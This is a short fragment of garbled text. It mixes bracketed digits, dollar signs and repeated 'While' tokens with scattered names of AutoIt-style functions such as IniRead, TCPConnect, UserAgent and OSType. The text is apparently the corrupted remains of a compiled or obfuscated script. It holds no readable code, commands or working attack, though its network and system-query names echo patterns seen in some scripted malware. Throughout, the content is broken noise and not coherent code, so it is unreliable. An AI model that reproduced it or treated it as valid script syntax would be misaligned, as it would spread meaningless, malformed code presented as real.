$[894]0[9IniRead$Bdi[9].0[8]B9[9]0[9]00[8]01[Ì9]S[9]0d0[9]0¹])[8]0and[9]0[StringIsFloat[9]0[[]00[89]StBd0[9]0[89$E
While""$hnt01[9]StB[9[8]t$9]00[89][899]0TCPConnectRead$$$$$$$8]Bdi[9].0[8]B9[9]000[8]01[Ì9]S[9]0d0[9]09])[81[9]S[9]0[[]00[89]S~tBd0[9]0Else[89$E
While""$hnt01[9]StB[9[8]t$9]00[89]StBdtB¥Ä]00[899]00[8]0[8]t$E
While""$hnt01[9]StB[9[8]t$E
While""$hnt001[9]00[[9])[8]00B9]0[9tUserAgent]t$E
While""$hnt$E
While""$hnt01[9]StB[9[8]t$E
While""$hnt001[9]00[/=89]StBd0]00[8]d0000[8]0[8]t$E
While""$hn@TAB9]StB[9[8]t$E
While""$hît0[t1]9S0B[9]00[89]Stle""$hnt01@[9]StB[9[8]t$E
While""$0[8]0[8]t$E
While""$hnt01[9]StB[9[8]t$d0[9]@OSTy0[89]00[8]0[8]t$E
While""$ht01[9]StB[9[8]t$E
While""$hnt001[9]StB[9]00[89pehi[9]00[8]ldIsInt01[9]